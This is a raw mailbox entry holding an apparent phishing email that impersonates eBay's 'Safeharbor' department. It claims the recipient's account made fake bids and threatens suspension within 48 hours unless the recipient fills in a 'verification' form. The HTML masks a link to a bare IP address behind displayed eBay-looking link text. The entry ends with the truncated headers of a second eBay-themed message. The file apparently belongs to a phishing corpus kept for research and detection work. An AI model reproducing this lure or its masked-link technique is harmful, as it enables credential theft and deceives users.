From: "Quinton Gray" <qgray_dy@ebay.com>
To: jose@monkey.org
Subject: =?iso-8859-1?b?RWJheSBBY2NvdW50IFJldmlldyBEZXBhcnRtZW50ICAgIHk1?=
Date: Sun, 20 Jun 2004 17:08:58 +0000
MIME-Version: 1.0
X-Sender: <qgray_dy@ebay.com>
Sender: <qgray_dy@ebay.com>
Reply-To: "Quinton Gray" <qgray_dy@ebay.com>
In-Reply-To: <2b2001c45223$92692aad$d4cc70e8@ddxxt02>
User-Agent: Mozilla/5.033 (Windows; U; NT4.0; U; NT4.0; en-us) Gecko/25250101
X-Accept-Language: en
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: 8bit
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 25

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

</td></tr> 
</table> 
</form></td> 
</tr> 
</table> 
<br> 


<div id=message> 
<table cellpadding=0 cellspacing=0 border=0 width="100%""><tr><td> 


<table cellSpacing="0" cellPadding="0" width="600" align="center" 
border="0"> 
  <tbody> 
    <tr> 
      <td><A target="_blank" 
href="http://www.ebay.com"    ><IMG 
src="http://pics.ebaystatic.com/aw/pics/navbar/eBayLogoTM.gif"border=0></A></td> 
    </tr> 
    <tr> 
      <td> </td> 
    </tr> 
    <tr> 
      <td><font color="#000000" size="3" face="Arial, Helvetica, 
sans-serif"><strong>***Urgent Safeharbor 
Department Notice***</strong></font></td> 
    </tr> 
    <tr> 
      <td> </td> 
    </tr> 
  </tbody> 
</table> 
<table cellSpacing="0" cellPadding="5" width="600" align="center" 
border="0"> 
  <tbody> 
    <tr> 
      <td height="259" vAlign="top"> <p>              <font size="2" 
face="Arial, Helvetica, 
sans-serif"><strong>eBay Fraud Mediation Request</strong><br> 
            <font size="1" face="Verdana, Arial, Helvetica, 
sans-serif">Date: Jun 2005
2005</font></font></p> 
        <p><font size="2" face="Arial, Helvetica, sans-serif">You have 
recieved this email because you or 
someone had used your account to make fake bids at eBay. For security 
purposes, we are required to open 
an investigation into this matter. </font></p> 
        <p><font size="2" face="Arial, Helvetica, sans-serif">          THE 
FRAUD ALERT ID CODE 
CONTAINED IN THIS MESSAGE WILL BE ATTACHED IN 
          OUR FRAUD MEDIATION REQUEST FORM, IN ORDER TO VERIFY YOUR EBAY 
ACCOUNT 
REGISTRATION INFORMATIONS.</font></p> 
        <p><font size="2" face="Arial, Helvetica, sans-serif"><strong>Fraud 
Alert ID CODE: 
00937614</strong><br> 
            <font size="1" face="Verdana, Arial, Helvetica, 
sans-serif">(Please save this Fraud Alert ID Code 
for your reference.</font>)<br> 
          <br> 
          To help speed up this process, 
          please access the following form to complete the verification of 
your eBay account registration 
informations:</font></p> 
        <p><strong><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://218.94.38.201/ebay/">http://scgi.ebay.com/verify_id­=ebay 
&fraud alert id code=00937614</a></font></stro­ng></p> 
        <table width="100%"  border="0" cellspacing="0" cellpadding="0"> 
          <tr> 
            <td><p><font size="1">.</font></p>            </td> 
          </tr> 
          <tr> 
            <td><table width="100%"  border="0"> 
              <tr> 
                <td bgcolor="#E6E6FF"><font size="2" face="Arial, Helvetica, 
sans-serif"><strong>Please Note: 
</strong><br> 
                  If we do not receive the appropriate eBay account 
verification within 48 hours, then we will 
assume this eBay account is fraudulent and will be suspended. <br> 
                  The purpose of this verification is to ensure that your 
eBay account has not been fraudulently 
used and to combat the fraud from our community.</font></td> 
              </tr> 
            </table></td> 
          </tr> 
        </table> 
        <p><font size="2" face="Arial, Helvetica, sans-serif"><font 
color="#000000">We appreciate your 
support and understanding, as we work together to keep eBay a safe place to 
trade.</font></font><font 
color="#000000" size="2" face="Arial, Helvetica, sans-serif"><BR> 
          <BR> 
  Thank you for your patience in this matter.</font></p> 
        <p align="left"><font color="#000000" size="2" face="Arial, 
Helvetica, sans-serif">Regards, 
Safeharbor Department (Trust and Safety Department)<br> 
  eBay Inc.</font><font size="2" face="Arial, Helvetica, sans-serif"><br> 
          <br> 
          <font color="#999999" size="1"> Please do not reply to this e-mail 
            as this is only a notification. Mail sent to this address cannot 
be 
      answered. </font></font></p>        </td> 
    </tr> 
    <tr> 
      <td align="middle" ><p align="center"><font color="#000000" size="1" 
face="Arial, 
Helvetica, sans-serif"><Br> 
          <br> 
          Copyright © 2005 eBay Inc. All Rights Reserved. Designated 
trademarks and brands are the 
property of their respective owners. eBay and the eBay logo are trademarks 
of eBay Inc. eBay is located at 
2145 Hamilton Avenue, San Jose, CA 95125. </font><br> 
        </p> 
      </td> 
    </tr> 
  </tbody> 
</table> 


</td></tr></table> 
</div> 


</td></tr></table> 


</td></tr></table> 
</div> 


</td></tr></table> 


</td></tr></table> 
</div> 
</body>
</html>

From gabrianc@tethys.webserversystems.com  Mon Jun 20 11:52:07 2005
Return-Path: <gabrianc@tethys.webserversystems.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 5F64F536EA6
	for <jose@login.monkey.org>; Mon, 20 Jun 2005 11:52:07 -0400 (EDT)
Received: from tethys.webserversystems.com (tethys.webserversystems.com [209.59.155.2])
	by mail1.monkey.org (Postfix) with ESMTP id 1547685AD41
	for <jose@monkey.org>; Mon, 20 Jun 2005 11:52:06 -0400 (EDT)
Received: from gabrianc by tethys.webserversystems.com with local (Exim 4.50)
	id 1DkOZB-0008Oz-F3
	for jose@monkey.org; Mon, 20 Jun 2005 11:52:05 -0400
To: jose@monkey.org
Subject: Update your eBay account!
